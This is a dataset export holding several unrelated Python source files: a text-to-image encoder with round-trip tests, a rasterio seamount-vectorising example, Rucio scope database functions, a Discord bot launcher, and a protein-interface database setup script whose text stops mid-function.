content
stringlengths 0
1.05M
| origin
stringclasses 2
values | type
stringclasses 2
values |
|---|---|---|
import re
import string
from math import sqrt
import numpy as np
from PIL import Image
from .test_utils import show_html_diff
def digits_in_base_as_tuple(x, base):
    """
    Return the digits of non-negative int ``x`` written in ``base``,
    most-significant digit first.

    e.g. digits_in_base_as_tuple(20, 2) == (1, 0, 1, 0, 0)

    Note: returns () for x == 0.
    """
    cur = x
    digs = []
    while cur:
        digs.append(cur % base)
        # floor division: plain ``/=`` yields floats on Python 3, which
        # breaks the modulo digits and the loop's termination
        cur //= base
    return tuple(reversed(digs))
def get_word_color_map_fcn(all_words):
    """
    Given an iterable of words, return a function mapping each word to an
    RGB tuple, with word colors maximally spaced through the 256**3 cube.

    A space ' ' is always added to the vocabulary (used for padding).
    """
    words = set(all_words)
    words.add(' ')  # add space for padding
    ncolors = 256 ** 3
    # floor division keeps the per-word color stride an int on Python 3
    ncolors_per_word = ncolors // len(words)
    word_order = sorted(words)

    def get_word_color(word):
        # raises ValueError for words outside the vocabulary
        ind = word_order.index(word)
        assert ind >= 0
        colors = digits_in_base_as_tuple(ind * ncolors_per_word, 256)
        # left-pad with zero channels up to a full (R, G, B) triple
        while len(colors) < 3:
            colors = (0,) + colors
        assert len(colors) == 3
        return colors
    return get_word_color
def list_to_uint8_array(colors, dims):
    """
    Reshape ``colors`` (a flat or nested list of ints) into a uint8 array
    of shape ``dims``. np.resize cycles the input, so if ``dims`` holds
    more entries than ``colors`` the data is replicated (with a warning).
    """
    arr = np.array(colors)
    arr_shaped = np.resize(arr, dims)
    if arr.size != arr_shaped.size:
        diff = arr_shaped.size - arr.size
        print("WARNING: txt will be replicated by {0} chars when printed to image".format(diff))
    arr_shaped = np.uint8(arr_shaped)
    return arr_shaped
def adjust_words_and_get_dims(words, verbose=False):
    """
    Pad ``words`` with spaces (in place) so the count is a perfect square,
    and return (words, [side, side, 3]) for use as image dimensions.
    """
    area = len(words)
    one_side = sqrt(area)
    # round up to the next whole side length
    desired_side = (int(one_side) + 1) if one_side > int(one_side) else int(one_side)
    diff = desired_side ** 2 - area
    words += [' '] * diff  # note: mutates the caller's list
    assert len(words) == desired_side ** 2, desired_side ** 2 - len(words)
    if verbose:
        print('Adding %s words to end of txt' % (diff,))
    return words, [desired_side, desired_side, 3]
def str_to_words(txt, keep_spaces=False):
    """
    Split ``txt`` into words.

    If ``keep_spaces``, each word is followed by the run of spaces that
    separated it from the next one (with a final ' ' appended as padding),
    so the result interleaves [word, spaces, word, spaces, ...].
    Leading whitespace is not preserved.
    """
    if keep_spaces:
        words = str_to_words(txt)
        # runs of spaces between words; pad with a trailing single space
        spaces = [x for x in re.split('[^ ]', txt) if x] + [' ']
        return [x for pair in zip(words, spaces) for x in pair]
    else:
        return txt.split()
def txt_to_uint8_array_by_word(txt):
    """Map each word of ``txt`` to an RGB color and pack into a square uint8 array."""
    word_list = str_to_words(txt, True)
    word_list, shape = adjust_words_and_get_dims(word_list)
    color_of = get_word_color_map_fcn(word_list)
    return list_to_uint8_array([color_of(w) for w in word_list], shape)
def adjust_txt_and_get_dims(txt, verbose=False):
    """
    Pad ``txt`` with spaces so its length equals 3 * side**2 for some
    integer side, and return (padded_txt, [side, side, 3]).
    """
    added = 0
    # pad so the length is divisible by 3 (one pixel = 3 chars)
    rem = len(txt) % 3
    add = 3 - rem if rem else 0
    txt += ' ' * add
    added += add
    # pad further so the pixel count is a perfect square
    area = len(txt) // 3  # floor division: keeps ``area`` an int on Python 3
    one_side = sqrt(area)
    desired_side = (int(one_side) + 1) if one_side > int(one_side) else int(one_side)
    diff = 3 * (desired_side ** 2 - area)
    txt += ' ' * diff
    added += diff
    assert len(txt) == 3 * (desired_side ** 2), 3 * (desired_side ** 2) - len(txt)
    if verbose:
        print('Adding %s spaces to end of txt' % (added,))
    return txt, [desired_side, desired_side, 3]
def txt_to_uint8_array_by_char(txt):
    """Encode each character's ordinal as one uint8 channel in a square array."""
    padded, shape = adjust_txt_and_get_dims(txt, True)
    return list_to_uint8_array([ord(ch) for ch in padded], shape)
def image_to_txt(imfile, txtfile):
    """
    Inverse of txt_to_image: read an RGB image and decode every color
    channel back into a character, writing the result to txtfile.

    note: colors were inserted depth first, so a pixel like
    (116, 104, 101) == #6A6865 decodes to 'the'
    (assumes all channel values are valid character ordinals)
    """
    png = Image.open(imfile).convert('RGB')
    arr = np.array(png)
    # flatten to one long channel sequence (R, G, B, R, G, B, ...)
    dims = arr.size
    arr_flat = np.resize(arr, dims)
    chars = [chr(x) for x in arr_flat]
    with open(txtfile, 'w') as f:
        f.write(''.join(chars))
def txt_to_image(txtfile, imfile, by_char=True):
    """
    Render a text file as an image, encoding either each character
    (by_char=True) or each word (by_char=False) as pixel data.
    """
    # use a context manager so the file handle is closed deterministically
    with open(txtfile) as f:
        txt = f.read()
    if by_char:
        arr = txt_to_uint8_array_by_char(txt)
    else:
        arr = txt_to_uint8_array_by_word(txt)
    im = Image.fromarray(arr)
    im.save(imfile)
def test_adjust_txt_and_get_dims():
    """Spot-check the padded square side computed for a range of lengths."""
    cases = zip([5, 10, 11, 19, 24, 25, 31, 32, 269393],
                [2, 2, 2, 3, 3, 3, 4, 4, 300])
    for length, side in cases:
        assert adjust_txt_and_get_dims(' ' * length)[1] == [side, side, 3], length
def test_invertibility(txtfile):
    """
    roughly, assert txtfile == image_to_txt(txt_to_image(txtfile))
    ignoring whitespace before and after txt
    """
    pngfile = txtfile.replace('.txt', '.png')
    txt_to_image(txtfile, pngfile)
    new_txtfile = txtfile.replace('.', '_new.')
    image_to_txt(pngfile, new_txtfile)
    original = open(txtfile).read().strip()
    roundtripped = open(new_txtfile).read().strip()
    assert original == roundtripped, show_html_diff((original, 'OG'), (roundtripped, 'NEW'))
def test_all():
    """Run the dimension unit test plus a round-trip test on a sample file."""
    test_adjust_txt_and_get_dims()
    test_invertibility('docs/tmp.txt')
if __name__ == '__main__':
    test_all()
    by_char = False
    base_dir = '/Users/mobeets/bpcs-steg/docs/'
    # (a previous assignment of ['karenina', 'warandpeace'] was immediately
    # overwritten and has been removed as dead code)
    names = ['tmp', 'tmp1', 'tmp2']
    infiles = [base_dir + name + '.txt' for name in names]
    # BUG FIX: ``outfiles`` was used before ever being defined (NameError).
    # txt_to_image's second argument is the image path, so derive .png
    # outputs from the same base names.
    outfiles = [base_dir + name + '.png' for name in names]
    for infile, outfile in zip(infiles, outfiles):
        txt_to_image(infile, outfile, by_char)
    # infile = '/Users/mobeets/Desktop/tmp2.png'
    # outfile = '/Users/mobeets/Desktop/tmp2.txt'
    # image_to_txt(infile, outfile, by_char)
|
nilq/baby-python
|
python
|
"""
Illustrates saving things back to a geotiff and vectorizing to a shapefile
"""
import numpy as np
import matplotlib.pyplot as plt
import rasterio as rio
import rasterio.features
import scipy.ndimage
import fiona
import shapely.geometry as geom
from context import data
from context import utils
# First, let's reproduce the labeled array of seamounts and areas
with rio.open(data.gebco.seamounts, 'r') as src:
    bathy = src.read(1)
    cellsize = src.transform.a  # Cells are square and N-S in this case
# Smooth bathymetry over a ~0.5-degree window to estimate the regional
# background depth, then flag cells standing more than 500 above it.
background = scipy.ndimage.uniform_filter(bathy, int(0.5 / cellsize))
better_threshold = bathy > (background + 500)
# Median filter removes small speckle; fill holes to get solid regions.
cleaned = scipy.ndimage.median_filter(better_threshold, 15)
filled = scipy.ndimage.binary_fill_holes(cleaned)
# Label connected regions; ``count`` is the number of features found.
labels, count = scipy.ndimage.label(filled)
# ------ Save as a geotiff ---------------------------------------------------
# Next, let's save the result as a geotiff. Because our data is the same size
# as the original raster, it's quite straight-forward:
# We'll copy over all settings from the original, but change two...
with rio.open(data.gebco.seamounts, 'r') as src:
    profile = src.profile.copy()
# Background features are 0, so we'll make that nodata/transparent.
profile['nodata'] = 0
profile['dtype'] = labels.dtype
# And let's actually write out the new geotiff...
with rio.open('regions_flagged_as_seamounts.tif', 'w', **profile) as dst:
    dst.write(labels, 1)
# ------ Save as a shapefile -------------------------------------------------
# Now let's vectorize the results and save them as a shapefile
# Just to make things a bit more interesting, let's go ahead and calculate some
# additional information to save in the shapefile's attribute table.
# Per-label depth extrema (labels run 1..count, hence the arange offset).
deepest = scipy.ndimage.maximum(bathy, labels, np.arange(count) + 1)
shallowest = scipy.ndimage.minimum(bathy, labels, np.arange(count) + 1)
# We'll need the affine transformation and the projection to go from pixel
# indices to actual locations. Let's grab those from the original geotiff.
with rio.open(data.gebco.seamounts, 'r') as src:
    transform = src.transform
    crs = src.crs
# Now let's specify our output shapefile's format...
meta = {'crs': crs, 'schema': {}, 'driver': 'ESRI Shapefile'}
meta['schema']['geometry'] = 'Polygon'
# And now we'll define the fields in the attribute table
meta['schema']['properties'] = {'raster_id': 'int',
                                'deepest': 'int',
                                'shallowest': 'int'}
# We don't want the background 0 to be a feature, so let's mask it out.
labels = np.ma.masked_equal(labels, 0)
with fiona.open('regions_flagged_as_seamounts.shp', 'w', **meta) as dst:
    vectors = rio.features.shapes(labels, transform=transform, connectivity=8)
    for poly, val in vectors:
        val = int(val)  # shapes returns a float, even when the input is ints.
        # The polygon we get here will have stairsteps along each pixel edge.
        # This part is optional, but it's often useful to simplify the geometry
        # instead of saving the full "stairstep" version.
        poly = geom.shape(poly).simplify(cellsize)
        poly = geom.mapping(poly)  # Back to a dict
        # ``val`` is 1-based (0 was masked background), so stats use val-1.
        record = {'geometry': poly,
                  'properties': {'deepest': int(deepest[val-1]),
                                 'shallowest': int(shallowest[val-1]),
                                 'raster_id': val}}
        dst.write(record)
|
nilq/baby-python
|
python
|
# Copyright European Organization for Nuclear Research (CERN)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Authors:
# - Thomas Beermann, <thomas.beermann@cern.ch>, 2012
# - Angelos Molfetas, <angelos.molfetas@cern.ch>, 2012
# - Mario Lassnig, <mario.lassnig@cern.ch>, 2012-2013
# - Vincent Garonne, <vincent.garonne@cern.ch>, 2012-2015
# - Cedric Serfon, <cedric.serfon@cern.ch>, 2015
# - Hannes Hansen, <hannes.jakob.hansen@cern.ch>, 2019
#
# PY3K COMPATIBLE
from re import match
from sqlalchemy.exc import IntegrityError
from traceback import format_exc
from rucio.common.exception import AccountNotFound, Duplicate, RucioException
from rucio.core.vo import vo_exists
from rucio.db.sqla import models
from rucio.db.sqla.constants import AccountStatus, ScopeStatus
from rucio.db.sqla.session import read_session, transactional_session
@transactional_session
def add_scope(scope, account, session=None):
    """ add a scope for the given account name.

    :param scope: the name for the new scope.
    :param account: the account to add the scope to.
    :param session: The database session in use.
    :raises RucioException: if the scope's VO does not exist or on an
        unexpected database error.
    :raises AccountNotFound: if the account does not exist or is inactive.
    :raises Duplicate: if the scope already exists.
    """
    if not vo_exists(vo=scope.vo, session=session):
        # BUG FIX: was ``exception.RucioException`` -- no ``exception``
        # module is imported here; RucioException is imported directly
        # from rucio.common.exception.
        raise RucioException('VO {} not found'.format(scope.vo))

    result = session.query(models.Account).filter_by(account=account, status=AccountStatus.ACTIVE).first()
    if result is None:
        raise AccountNotFound('Account ID \'%s\' does not exist' % account)

    new_scope = models.Scope(scope=scope, account=account, status=ScopeStatus.OPEN)
    try:
        new_scope.save(session=session)
    except IntegrityError as e:
        # map the backend-specific unique-constraint messages to Duplicate
        if match('.*IntegrityError.*ORA-00001: unique constraint.*SCOPES_PK.*violated.*', e.args[0]) \
           or match('.*IntegrityError.*1062, "Duplicate entry.*for key.*', e.args[0]) \
           or match('.*IntegrityError.*UNIQUE constraint failed: scopes.scope.*', e.args[0]) \
           or match('.*IntegrityError.*duplicate key value violates unique constraint.*', e.args[0])\
           or match('.*sqlite3.IntegrityError.*is not unique.*', e.args[0]):
            raise Duplicate('Scope \'%s\' already exists!' % scope)
        # previously an unmatched IntegrityError was silently swallowed;
        # surface it as a RucioException instead
        raise RucioException(str(format_exc()))
    except Exception:
        raise RucioException(str(format_exc()))
@read_session
def bulk_add_scopes(scopes, account, skipExisting=False, session=None):
    """ add a group of scopes, this call should not be exposed to users.

    :param scopes: a list of scopes to be added.
    :param account: the account associated to the scopes.
    :param session: The database session in use.
    """
    for each_scope in scopes:
        try:
            add_scope(each_scope, account, session=session)
        except Duplicate:
            if skipExisting:
                continue
            raise
@read_session
def list_scopes(session=None):
    """
    Lists all scopes.

    :param session: The database session in use.
    :returns: A list containing all scopes.
    """
    active = session.query(models.Scope).filter(models.Scope.status != ScopeStatus.DELETED)
    return [row.scope for row in active]
@read_session
def get_scopes(account, session=None):
    """ get all scopes defined for an account.

    :param account: the account name to list the scopes of.
    :param session: The database session in use.
    :returns: a list of all scope names for this account.
    :raises AccountNotFound: if the account does not exist.
    """
    if session.query(models.Account).filter_by(account=account).first() is None:
        raise AccountNotFound('Account ID \'%s\' does not exist' % account)
    rows = session.query(models.Scope).filter_by(account=account).filter(models.Scope.status != ScopeStatus.DELETED)
    return [row.scope for row in rows]
@read_session
def check_scope(scope_to_check, session=None):
    """ check to see if scope exists.

    :param scope: the scope to check.
    :param session: The database session in use.
    :returns: True or false
    """
    found = session.query(models.Scope).filter_by(scope=scope_to_check).first()
    return found is not None
@read_session
def is_scope_owner(scope, account, session=None):
    """ check to see if account owns the scope.

    :param scope: the scope to check.
    :param account: the account to check.
    :param session: The database session in use.
    :returns: True or false
    """
    owner_row = session.query(models.Scope).filter_by(scope=scope, account=account).first()
    return owner_row is not None
|
nilq/baby-python
|
python
|
import os
import discord
from discord.ext import commands
import sqlite3
import traceback
import sys
import asyncpg
from asyncpg.pool import create_pool
import json
import keep_alive
# Load bot credentials and settings from the JSON config file.
with open ('config/botconfig.json', 'r') as f:
    config = json.load(f)
token = config['token']
prefix = config['prefix']
database_url = config['database_url']
# for replit
'''
token = os.environ.get("token")
prefix = os.environ.get("prefix")
database_url = os.environ.get("database_url")
'''
intents = discord.Intents().all()
bot = commands.Bot(command_prefix=prefix, intents = discord.Intents.all())
# Remove the built-in help command (a replacement may be defined in a cog
# loaded below -- TODO confirm).
bot.remove_command('help')
# NOTE(review): this sets ``members`` on the local ``intents`` object, but the
# bot above was constructed with a fresh ``discord.Intents.all()`` -- this
# assignment appears to have no effect on the bot; verify intent wiring.
intents.members = True
# database
async def create_db_pool():
    """Create the asyncpg connection pool and attach it to the bot."""
    bot.pg_con = await asyncpg.create_pool(database_url)
    print("[\] DATABASE CONNECTED")
# Ready
@bot.event
async def on_ready():
    """Set the bot's presence once the gateway connection is established."""
    await bot.change_presence(status=discord.Status.idle, activity=discord.Activity(type=discord.ActivityType.watching, name="DMs for help") )
    print("[\] BOT ONLNE")
# modules importing
with open ('./config/modules.json', 'r') as f:
    cogsData = json.load(f)
module = cogsData['extensions']
if __name__ == "__main__":
    # Load every extension listed in the config; report failures without
    # aborting the remaining loads.
    for values in module:
        try:
            bot.load_extension(values)
            print(f"[/] loaded | {values}")
        except:
            print(f'Error loading {values}', file=sys.stderr)
            traceback.print_exc()
    # keep_alive starts a small web server (commonly used so hosting
    # platforms keep the process running -- see keep_alive module).
    keep_alive.keep_alive()
    # Connect to the database before entering the blocking bot loop.
    bot.loop.run_until_complete(create_db_pool())
    bot.run(token)
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
"""
Setups a protein database in MySQL: a database of interesting properties of the proteins based on scripts of this library.
This should be easy to use script for invoking the most important scripts of the library and store them in DB
for easy retrieve.
How to use:
Create a folder and place there some file with list of PDBs to analyze.
The program will create the following directory structure in the same directory:
./pdbs/ - list of pdbs downloaded
./results/ - results of the analysis scripts
"""
from __future__ import print_function
import argparse
import os
import subprocess
import sys
import pkg_resources
import requests
from Bio.PDB.PDBParser import PDBParser
from Bio.PDB.ResidueDepth import get_surface, min_dist
from pyPPI import DBConfig
import pyPPI.surfaceComplementarity.VDW as VDW
import pyPPI.surfaceComplementarity.interfaceDepth as Periphery
from pyPPI.ASA import ASA
from pyPPI.hbonds import hbonds
from pyPPI.kdtree import KDTree
import pyPPI.pdbReader as pdbReader
from pyPPI.pdbReader import PDBReader
import pyPPI.electrostat as electrostat
from pyPPI.cavities import calculateVolume
"""
Distance in angtroms between the chains that is relevant for defining the interface
"""
INTERFACE_DISTANCE = 4
WORKING_DIRECTORY = './'
PDBS_DIR = "./pdbs/"
RESULTS_DIR = "./results/"
_remediator = pkg_resources.resource_filename('pyPPI', '/'.join(['molprobity', 'remediator.pl']))
_reduce_path = pkg_resources.resource_filename('pyPPI', '/'.join(['molprobity', 'reduce']))
def download_PDB(pdb):
    """
    Downloads a PDB from protein data base
    :param pdb: pdb identifier
    """
    url = 'http://www.rcsb.org/pdb/files/{0}.pdb'.format(pdb)
    print('downloading %s (%s)' % (pdb, url))
    response = requests.get(url)
    with get_file(pdb) as newPDB:
        print(response.text, file=newPDB)
def get_file(name):
    """
    Open ``<PDBS_DIR>/<name>.pdb`` for writing.
    :param name: pdb identifier (without extension)
    :return: writable file handle
    """
    pdb_path = os.path.join(PDBS_DIR, name + ".pdb")
    return open(pdb_path, "w")
def download_DB(pdbList):
    """
    Downloads PDB and add hydrogens using molprobity
    :param pdbList: list of pdbs to download
    """
    print("Downloading pdbs according to list")
    for pdb in pdbList:
        # skip entirely when the hydrogenated copy already exists
        if os.path.exists(os.path.join(PDBS_DIR, pdb + "_FH.pdb")):
            continue
        # download only if the raw PDB isn't already in the directory
        if not os.path.exists(os.path.join(PDBS_DIR, pdb + ".pdb")):
            download_PDB(pdb)
        molprobity(pdb)
    print("Finished downloading pdbs")
def molprobity(pdb_name):
    """
    Adds hydrogens to a PDB using molprobity's remediator/reduce tools,
    writing ``<pdb_name>_FH.pdb`` and removing the original file.

    :param pdb_name: name of the PDB file (without extension)
    :return: True if the hydrogenated file already existed, else None
    """
    global MOLPROBITY_DIR, PDBS_DIR
    if os.path.exists(os.path.join(PDBS_DIR, pdb_name + "_FH.pdb")):
        return True  # already exist
    print('Starting molprobity %s' % pdb_name)
    subprocess.check_output('perl ' + _remediator + ' ' + os.path.join(PDBS_DIR,
                                                                       pdb_name + ".pdb") + ' > a',
                            shell=True)
    try:
        subprocess.check_output(_reduce_path + ' a > b', shell=True)
    except subprocess.CalledProcessError:
        # reduce returns exit status 1 even on success, so only log here
        # (was a bare ``except:``, which also hid KeyboardInterrupt etc.)
        print('error parsing PDB %s' % pdb_name)
    subprocess.check_output(
        'perl ' + _remediator + ' b -oldout> ' + os.path.join(PDBS_DIR, pdb_name + "_FH.pdb"),
        shell=True)
    # delete the PDB file - we will work with a file with hydrogens added (_FH create above)
    os.remove(os.path.join(PDBS_DIR, pdb_name + ".pdb"))
def buildASAperAtomForComplex(pdb, result):
    """Write per-atom ASA rows for a complex to ``result``, both bound (0) and separated (1)."""
    asaCalc = ASA(pdb)
    asaCalc.execute()
    for atom, asa in asaCalc.interPerAtom.items():
        common = [pdb.name, atom.chain, atom.residue, atom.resId, atom.symbol, atom.atomType]
        # complex inter: ASA measured with the partner chains present
        inter_row = common + [asa, atom.tempFactor, 0]
        print(','.join(str(v) for v in inter_row), file=result)
        # complex intra (separated): add back the ASA buried by the interface
        separated_asa = asaCalc.diffASAperAtom[atom] + asa
        intra_row = common + [separated_asa, atom.tempFactor, 1]
        print(','.join(str(v) for v in intra_row), file=result)
def calcInterfaceDist(pdb, result):
    """
    Defines interface by distance
    """
    global INTERFACE_DISTANCE
    partA = [a for a in pdb.atoms if a.chain in pdb.interfaceParts[0]]
    partB = [a for a in pdb.atoms if a.chain in pdb.interfaceParts[1]]
    if not partA or not partB:
        print('WARNING: %s doesnt have atoms in one its chains' % pdb.name)
        return
    aTree = KDTree.construct_from_data(partA[:])
    bTree = KDTree.construct_from_data(partB[:])
    complexChains = ':'.join(pdb.interfaceParts)
    # an atom is at the interface when its nearest neighbour in the
    # opposite part lies within INTERFACE_DISTANCE
    for part, opposite_tree in ((partA, bTree), (partB, aTree)):
        for atom in part:
            near, dist = opposite_tree.findNearest(query_point=atom.coord, num=1)
            if dist < INTERFACE_DISTANCE:
                row = [pdb.name, complexChains, atom.chain, str(atom.resId), atom.symbol, atom.atomType, str(dist)]
                print(','.join(row), file=result)
def createInterfaceCSV(pdbsToAnalyze):
    """
    interface can be defined by either ASA or distance
    we use both of them

    :param pdbsToAnalyze: list of (pdbName, 'A:B') tuples naming complexes
    """
    global PDBS_DIR, RESULTS_DIR
    # BUG FIX: the existence check listed 'PerAtomASA.csv' twice; it now
    # checks both outputs, so a missing distance file is regenerated.
    if all(os.path.exists(os.path.join(RESULTS_DIR, resFile)) for resFile in ['PerAtomASA.csv', 'PerAtomDistance.csv']):
        print('Data already exist in result directory.')
        return
    with open(os.path.join(RESULTS_DIR, 'PerAtomASA.csv'), 'w') as asaPerAtom:
        with open(os.path.join(RESULTS_DIR, 'PerAtomDistance.csv'), 'w') as distancePerAtom:
            pdbs = os.listdir(PDBS_DIR)
            print('PDB,Chains,Chain,ResId,Symbol,Atom,MinDistance', file=distancePerAtom)
            print('PDB,Chain,Residue,ResId,Symbol,AtomType,ASA,tempFactor,Seperated', file=asaPerAtom)
            failedPDBs = []
            pdbsNamesToChains = dict((p[0], p[1].split(':') if len(p) > 1 else None) for p in pdbsToAnalyze)
            for pdbName in pdbs:
                # only process files whose 4-char PDB id was requested
                if pdbName[0:4] not in pdbsNamesToChains:
                    continue
                pdb = PDBReader.readFile(os.path.join(PDBS_DIR, pdbName), pdbsNamesToChains[pdbName[0:4]])
                try:
                    print('Writing ASA for %s' % pdb.name)
                    buildASAperAtomForComplex(pdb, asaPerAtom)
                    print('Writing distance for %s' % pdb.name)
                    calcInterfaceDist(pdb, distancePerAtom)
                except IndexError:
                    failedPDBs.append(pdb.name)
    print('Finished')
    if len(failedPDBs) > 0:
        print('Failed to process:', ','.join(failedPDBs))
def createDataBase(pdbsToAnalyzeWithChains):
    """Loads the computations to a new database

    :param pdbsToAnalyzeWithChains: list of (pdbName, 'A:B') tuples
    """
    print('Creating DB: %s' % DBConfig.DB_NAME)
    installDB = pkg_resources.resource_filename('pyPPI', '/'.join(['sqls', 'createDB.sql']))
    metadataDB = pkg_resources.resource_filename('pyPPI', '/'.join(['sqls', 'donors2.sql']))
    createInterfaceSql = pkg_resources.resource_filename('pyPPI', '/'.join(['sqls', 'createInterface.sql']))
    # NOTE(security): credentials are interpolated into shell command lines,
    # making them visible in the process list; consider mysql option files.
    subprocess.call(
        "mysql -u%s -p%s -e 'create database if not exists %s'" % (DBConfig.USER, DBConfig.PASSWD, DBConfig.DB_NAME),
        shell=True)
    # create schema
    subprocess.call('mysql %s -u%s -p%s < %s ' % (DBConfig.DB_NAME, DBConfig.USER, DBConfig.PASSWD, installDB),
                    shell=True)
    # insert metadata
    subprocess.call('mysql %s -u%s -p%s < %s ' % (DBConfig.DB_NAME, DBConfig.USER, DBConfig.PASSWD, metadataDB),
                    shell=True)
    conn = DBConfig.get_connection()
    cursor = conn.cursor()
    cursor.execute('''
    load data local infile '%s' into table interfaceDist fields terminated by ',' optionally enclosed by '"' lines terminated by '\n' ignore 1 lines (PDB,Chains,Chain,ResId,Symbol,Atom,MinDist);
    ''' % (os.path.join(RESULTS_DIR, 'PerAtomDistance.csv')))
    cursor.execute('''
    load data local infile '%s' into table perAtomASA fields terminated by ',' optionally enclosed by '"' lines terminated by '\n' ignore 1 lines (PDB,Chain,Residue,ResId,Symbol,Atom,ASA,Bfactor,Seperated);
    ''' % (os.path.join(RESULTS_DIR, 'PerAtomASA.csv')))
    conn.commit()
    # create interface table
    subprocess.call('mysql %s -u%s -p%s < %s ' % (DBConfig.DB_NAME, DBConfig.USER, DBConfig.PASSWD, createInterfaceSql),
                    shell=True)
    # add metadata table with complexs in the database
    pdbsNamesToChains = dict((p[0], p[1].split(':') if len(p) > 1 else None) for p in pdbsToAnalyzeWithChains)
    dataToInsert = []
    for pdbName, chains in pdbsNamesToChains.items():
        pdb = PDBReader.readFile(os.path.join(PDBS_DIR, '%s_FH.pdb' % pdbName), pdbsNamesToChains[pdbName[0:4]])
        if chains is None:
            compunds = pdb.compunds.split(' - ')
            # BUG FIX: the NameA fallback previously inserted the whole
            # ``compunds`` list instead of a string when there was no
            # ' - ' separator; use the first element in both cases.
            dataToInsert.append((pdbName, pdb.interfaceParts[0], compunds[0],
                                 pdb.interfaceParts[1], compunds[1] if len(compunds) > 1 else ''))
        else:
            dataToInsert.append((pdbName, pdb.interfaceParts[0], '', pdb.interfaceParts[1], ''))
    cursor = conn.cursor()
    cursor.executemany('''
    INSERT INTO proteinComplex (PDB,UnboundChainA,NameA,UnboundChainB,NameB)
    values (%s,%s,%s,%s,%s)
    ''', dataToInsert)
    conn.commit()
    conn.close()
    print('database created!')
def getInterfaceAtoms(cur, pdb):
    """
    Gets interface atoms from database
    :param cur: cursor to database
    :param pdb: pdb object to get atoms from
    :return: list of interface atoms
    """
    # parameterized query (was '%s' string interpolation, which is
    # SQL-injection prone and breaks on names containing quotes)
    cur.execute('''
    select Chain,ResId,Symbol from NinterfaceAtoms
    where PDB=%s
    ''', (pdb.name,))
    interfaceAtoms = []
    for chain, resid, symbol in cur.fetchall():
        interfaceAtoms.append(
            next(a for a in pdb.atoms if a.chain == chain and a.resId == resid and a.symbol == symbol))
    return interfaceAtoms
def fillInterfacePeriphrial(pdbsToAnalyze):
    """
    Compute per-atom interface peripheral measures, write them to
    interfacePeriphrial.csv and load the CSV into the database.

    :param pdbsToAnalyze: list of (pdbName, 'A:B') tuples
    """
    global PDBS_DIR, RESULTS_DIR
    if os.path.exists(os.path.join(RESULTS_DIR, 'interfacePeriphrial.csv')):
        print('Data already exist in result directory for interface periphery.')
        return
    pdbsNamesToChains = dict((p[0], p[1].split(':') if len(p) > 1 else None) for p in pdbsToAnalyze)
    with open(os.path.join(RESULTS_DIR, 'interfacePeriphrial.csv'), 'w') as interfacePeriphrial:
        print('PDB,Chain,ResId,Symbol,Peripherial,PropPeri', file=interfacePeriphrial)
        for pdbName, chains in pdbsNamesToChains.items():
            print('Calculating peripheral table for %s ' % pdbName)
            pdb_path = os.path.join(PDBS_DIR, '%s_FH.pdb' % pdbName)
            depthL, peripherialL = Periphery.calc_peripheral_PDB(pdb_path, chains)
            for atom, peri, propPeri in peripherialL:
                print(','.join([pdbName, atom.chain, str(atom.resId), atom.symbol, str(peri), str(propPeri)]),
                      file=interfacePeriphrial)
    # BUG FIX: this load-to-database section appeared twice verbatim,
    # importing the same CSV into the table twice (duplicated rows).
    conn = DBConfig.get_connection()
    cursor = conn.cursor()
    cursor.execute('''
    load data local infile '%s' into table interfacePeriphrial
    fields terminated by ',' optionally enclosed by '"' lines terminated by '\n'
    ignore 1 lines (PDB,Chain,ResId,Symbol,Peri,PropPeri);
    ''' % (os.path.join(RESULTS_DIR, 'interfacePeriphrial.csv')))
    conn.commit()
    conn.close()
def residue_depth(pdbName, ReaderAtomsInput, filename, UseInterfaceAtoms=False):
    """
    Compute per-atom distance to the molecular surface via Biopython.

    :param pdbName: structure id handed to the parser
    :param ReaderAtomsInput: pdbReader atoms to translate/report on
    :param filename: path of the PDB file to parse
    :param UseInterfaceAtoms: restrict to ReaderAtomsInput when True
    :return: list of [pdbReader atom, distance] pairs
    """
    parser = PDBParser(PERMISSIVE=1)
    model = parser.get_structure(pdbName, filename)[0]
    BioAtoms = [atom
                for chain in model
                for residue in chain
                for atom in residue]
    if UseInterfaceAtoms:
        BioAtoms = pdbReader_to_BioPyth(ReaderAtomsInput, BioAtoms)
    surface = get_surface(model)
    BioDepthDistances = [[atom, min_dist(atom.get_coord(), surface)]
                         for atom in BioAtoms]
    return BioPyth_to_pdbReader(BioDepthDistances, ReaderAtomsInput)
def pdbReader_to_BioPyth(ReaderAtomsInput, BioAtomsInput):
    """Match pdbReader atoms to Biopython atoms by residue id and atom name."""
    matched = []
    for reader_atom in ReaderAtomsInput:
        target_id = (' ', reader_atom.resId, ' ')
        for bio_atom in BioAtomsInput:
            # first Biopython atom in the same residue with the same name wins
            if bio_atom.get_parent().get_id() == target_id and bio_atom.get_name() == reader_atom.symbol:
                matched.append(bio_atom)
                break
    return matched
def BioPyth_to_pdbReader(BioAtomsInput, ReaderAtomsInput):
    """Translate [Biopython atom, dist] pairs back to [pdbReader atom, dist] pairs."""
    translated = []
    for bio_atom, dist in BioAtomsInput:
        residue_id = bio_atom.get_parent().get_id()
        for reader_atom in ReaderAtomsInput:
            if residue_id == (' ', reader_atom.resId, ' ') and bio_atom.get_name() == reader_atom.symbol:
                translated.append([reader_atom, dist])
                break
    return translated
def calcEnergyTerms(pdbsToAnalyze):
    """
    Finds hydrogen bonds near interface atoms and calculates their energy,
    and calculates VDW and electrostatic energy for PDB

    pdbsToAnalyze: list of [pdbName] or [pdbName, "A:B"] entries.
    Each energy term is written to its own CSV under RESULTS_DIR; terms whose
    CSV already exists are skipped, so the function is resumable.  Some CSVs
    are additionally bulk-loaded into MySQL tables.
    NOTE(review): indentation was reconstructed from a whitespace-stripped
    source during review.
    """
    global PDBS_DIR, RESULTS_DIR
    # One CSV per energy term; when every file already exists there is nothing to do.
    output_file_list = ['Ndrieding.csv', 'interfaceVDW.csv', 'electrostatic.csv', 'electrostatic-hydrophobic.csv', 'cavity_vol.csv', 'cavity_res.csv', 'residue_depth.csv']
    if all(os.path.exists(os.path.join(RESULTS_DIR, resFile)) for resFile in output_file_list):
        print('Data already exists in result directory for energy terms.')
        return
    conn = DBConfig.get_connection()
    cursor = conn.cursor()
    # pdb name -> list of chain ids, or None when no chains were specified
    pdbsNamesToChains = dict((p[0], p[1].split(':') if len(p) > 1 else None) for p in pdbsToAnalyze)
    # --- Hydrogen bonds (DREIDING energies near the interface) ---
